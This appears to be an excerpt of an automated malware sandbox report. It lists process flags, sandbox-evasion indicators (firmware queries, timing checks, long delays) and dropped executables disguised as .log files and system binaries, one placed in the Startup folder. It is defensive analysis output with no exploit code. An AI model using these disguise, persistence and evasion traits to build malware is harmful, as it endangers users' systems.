                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                   Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\ProgramData\migrate.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\IntelConfigService.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\Superfetch.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Tasks\1.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Bridgeprovider.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exe - System information queried: FirmwareTableInformation
                                  Source: C:\Windows\Bridgeprovider.exe - Memory allocated: 1770000 memory reserve | memory write watch
                                  Source: C:\Windows\Bridgeprovider.exe - Memory allocated: 1B3F0000 memory reserve | memory write watch
                                  Source: C:\Windows\Tasks\MSTask.exe - Code function: 62_2_00007FFDFB0063AC rdtsc 62_2_00007FFDFB0063AC
                                  Source: C:\Windows\Tasks\Wmiic.exe - Code function: OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapFree,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,31_2_000000014000EE50
                                  Source: C:\Windows\Tasks\Wmiic.exe - Code function: EnumServicesStatusExW,GetLastError,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,31_2_0000000140011A80
                                  Source: C:\Windows\Tasks\Wmiic.exe - Code function: OpenServiceW,GetServiceDisplayNameW,GetServiceKeyNameW,GetLastError,GetLastError,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,GetProcessHeap,HeapFree,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,37_2_000000014000EE50
                                  Source: C:\Windows\Tasks\Wmiic.exe - Code function: EnumServicesStatusExW,GetLastError,GetLastError,GetProcessHeap,HeapAlloc,EnumServicesStatusExW,GetLastError,_snwprintf_s,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,37_2_0000000140011A80
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Bridgeprovider.exe - Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exe - Window found: window name: WSH-Timer
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7630
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2045
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7331
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1959
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6414
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 3387
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 8565
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1144
                                  Source: C:\Windows\Tasks\IntelConfigService.exe - Window / User API: threadDelayed 7109
                                  Source: C:\Windows\Tasks\Superfetch.exe - Window / User API: threadDelayed 8545
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\AtXEfMql.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_ctypes.pyd
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe - Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_socket.pyd
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_bz2.pyd
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\QLwtIihK.log
                                  Source: C:\ProgramData\migrate.exe - Dropped PE file which has not been started: C:\Windows\Tasks\MicrosoftPrt.exe
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\IZEltFrY.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\HcddYGcd.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\brrRNKBn.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\Aepdvrho.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\quigFLkP.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\EjOumJqe.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\syIwhxhC.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\IIxTfkxV.log
                                  Source: C:\Windows\SysWOW64\cmd.exe - Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\sPPOvTaE.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_queue.pyd
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\unicodedata.pyd
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\hbkYLHfW.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_hashlib.pyd
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\UtDRkwHy.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\KbrUPpvT.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\python38.dll
                                  Source: C:\ProgramData\migrate.exe - Dropped PE file which has not been started: C:\Windows\Tasks\WinRing0x64.sys
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\DmmmRJbk.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\OIKLmzcP.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\UBnkPfhE.log
                                  Source: C:\Windows\Bridgeprovider.exe - Dropped PE file which has not been started: C:\Users\user\Desktop\tvjECxvw.log
                                  Source: C:\Windows\Tasks\MSTask.exe - Dropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_lzma.pyd
